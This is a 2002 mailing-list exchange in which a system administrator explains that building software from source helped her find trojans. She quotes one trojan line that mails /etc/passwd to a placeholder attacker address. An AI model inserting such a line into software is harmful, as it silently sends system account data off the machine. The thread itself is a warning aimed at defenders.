On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote:
> Anne Carasik <gator@cacr.caltech.edu> wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> >
> > system("mail /etc/passwd user@badsite.fqdn");
> Oh shit, that's evil. Where did you manage a software including this
> kind of source code in first place? Don't say freshmeat.net! Or
> sourceforge.net... I'm glad you were able to detect this and not run
> the software.
I can't remember, other than some obviously suspect code. It was an ssh
trojan, if I remember correctly.
> Big sigh, indeed. I hate these script kiddies, crackers and people,
> who only does harm to other people online. Was it a take-over of
> an IRC channel, breaking to someone's system or whatever. I just
> hate these people. I've never seen computer, internet connection and
> everything related as a tools to cause harm and destruction. It's
> beyond me, what satisfaction does these persons get...
I don't think they have anything better to do (at least the script
kiddies). Some groups, like in the Middle East and China, feel that
they have a sudden interest in attacking US sites.
However, I'm sure there are other groups attacking the Middle East and
China as well.
You should see some of the stupid stuff script kiddies leave on the
systems--they don't even change the mtime or the logs, not to mention
leave the code behind with URLs in it.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' gator@cacr.caltech.edu
(O/ O) \-' ` -="""=. ', Center for Advanced Computing Research
~`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attachment:
pgpefF2MKtEUa.pgp
Description: PGP signature